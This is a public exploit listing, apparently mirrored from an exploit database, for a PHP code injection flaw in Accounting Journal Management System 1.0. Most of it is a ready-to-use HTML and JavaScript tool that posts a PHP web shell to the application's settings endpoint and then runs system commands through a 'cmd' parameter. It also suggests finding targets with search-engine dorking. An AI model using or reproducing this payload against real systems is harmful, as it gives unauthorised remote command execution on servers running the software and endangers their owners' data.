Accounting Journal Management System 1.0 Code Injection exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:180251 ============================================================================================================================================= | # Title : Accounting Journal Management System 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload injects code of your choice into an HTML page. You give it a name and save it in the root directory of the script. and executes it remotely. [+] Line 11 : 'Content[welcome]' = Replace "welcome" with any label you want. [+] Line 11 : Replace the payload as you wish = <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> [+] save payload as poc.html [+] Set your target url [+] payload : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> PHP code injection Tool</title> <script> async function sendRequest() { const url = document.getElementById('url').value; const postData = { 'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>` }; try { const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: new URLSearchParams(postData).toString() }); if (response.ok) { document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n'; } else { document.getElementById('result').innerText = 'Error: ' + response.statusText; } } catch (error) { document.getElementById('result').innerText = 'Error making request: ' + error.message; } } </script> </head> <body> <h1>Injection Tool</h1> <form onsubmit="event.preventDefault(); sendRequest();"> <label for="url">Enter URL:</label> <input type="text" id="url" name="url" required> <button type="submit">Submit</button> </form> <pre id="result"></pre> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================